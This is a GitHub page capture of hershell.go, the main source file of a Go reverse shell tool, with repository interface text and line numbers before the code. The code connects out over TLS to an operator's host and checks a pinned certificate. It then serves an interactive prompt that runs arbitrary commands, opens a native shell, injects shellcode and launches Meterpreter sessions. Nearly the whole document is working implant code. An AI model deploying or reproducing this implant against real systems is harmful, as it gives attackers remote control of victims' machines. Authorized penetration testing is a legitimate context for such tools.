-
Notifications
You must be signed in to change notification settings - Fork 98
/
Copy pathhershell.go
122 lines (107 loc) · 2.33 KB
/
hershell.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
package main
import (
"bufio"
"bytes"
"crypto/sha256"
"crypto/tls"
"encoding/hex"
"net"
"os"
"strings"
"github.com/lesnuages/hershell/meterpreter"
"github.com/lesnuages/hershell/shell"
)
const (
errCouldNotDecode = 1 << iota
errHostUnreachable = iota
errBadFingerprint = iota
)
var (
connectString string
fingerPrint string
)
func interactiveShell(conn net.Conn) {
var (
exit = false
prompt = "[hershell]> "
scanner = bufio.NewScanner(conn)
)
conn.Write([]byte(prompt))
for scanner.Scan() {
command := scanner.Text()
if len(command) > 1 {
argv := strings.Split(command, " ")
switch argv[0] {
case "meterpreter":
if len(argv) > 2 {
transport := argv[1]
address := argv[2]
ok, err := meterpreter.Meterpreter(transport, address)
if !ok {
conn.Write([]byte(err.Error() + "\n"))
}
} else {
conn.Write([]byte("Usage: meterpreter [tcp|http|https] IP:PORT\n"))
}
case "inject":
if len(argv) > 1 {
shell.InjectShellcode(argv[1])
}
case "exit":
exit = true
case "run_shell":
conn.Write([]byte("Enjoy your native shell\n"))
runShell(conn)
default:
shell.ExecuteCmd(command, conn)
}
if exit {
break
}
}
conn.Write([]byte(prompt))
}
}
func runShell(conn net.Conn) {
var cmd = shell.GetShell()
cmd.Stdout = conn
cmd.Stderr = conn
cmd.Stdin = conn
cmd.Run()
}
func checkKeyPin(conn *tls.Conn, fingerprint []byte) (bool, error) {
valid := false
connState := conn.ConnectionState()
for _, peerCert := range connState.PeerCertificates {
hash := sha256.Sum256(peerCert.Raw)
if bytes.Compare(hash[0:], fingerprint) == 0 {
valid = true
}
}
return valid, nil
}
func reverse(connectString string, fingerprint []byte) {
var (
conn *tls.Conn
err error
)
config := &tls.Config{InsecureSkipVerify: true}
if conn, err = tls.Dial("tcp", connectString, config); err != nil {
os.Exit(errHostUnreachable)
}
defer conn.Close()
if ok, err := checkKeyPin(conn, fingerprint); err != nil || !ok {
os.Exit(errBadFingerprint)
}
interactiveShell(conn)
}
func main() {
if connectString != "" && fingerPrint != "" {
fprint := strings.Replace(fingerPrint, ":", "", -1)
bytesFingerprint, err := hex.DecodeString(fprint)
if err != nil {
os.Exit(errCouldNotDecode)
}
reverse(connectString, bytesFingerprint)
}
}